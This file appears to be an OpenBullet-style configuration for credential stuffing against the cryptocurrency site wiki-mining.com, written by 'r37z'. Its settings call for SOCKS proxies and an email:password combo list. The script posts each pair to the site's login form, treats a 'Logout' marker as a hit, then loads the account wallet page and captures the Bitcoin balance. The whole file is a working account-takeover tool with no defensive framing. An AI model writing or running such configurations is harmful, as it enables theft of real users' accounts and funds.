[SETTINGS]
{
  "Name": "wiki-mining.com",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2019-08-03T06:51:44.800268+02:00",
  "AdditionalInfo": "",
  "Author": "r37z",
  "Version": "1.1.3",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": true,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://wiki-mining.com/home/" 
  CONTENT "email=<USER>&password=<PASS>&btc_login=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: wiki-mining.com" 
  HEADER "Origin: https://wiki-mining.com" 
  HEADER "Referer: https://wiki-mining.com/home/" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "Logout" 
  KEYCHAIN Failure OR 
    KEY "Wrong email address or password." 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "Your account has been temporarily disabled" 

REQUEST GET "https://wiki-mining.com/home/account/wallet" 
  
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: wiki-mining.com" 
  HEADER "Referer: https://wiki-mining.com/home/" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 

PARSE "<SOURCE>" LR "<div id=\"header_id\">  " "<a href=\"deposit\">" -> CAP "Balance BTC" 

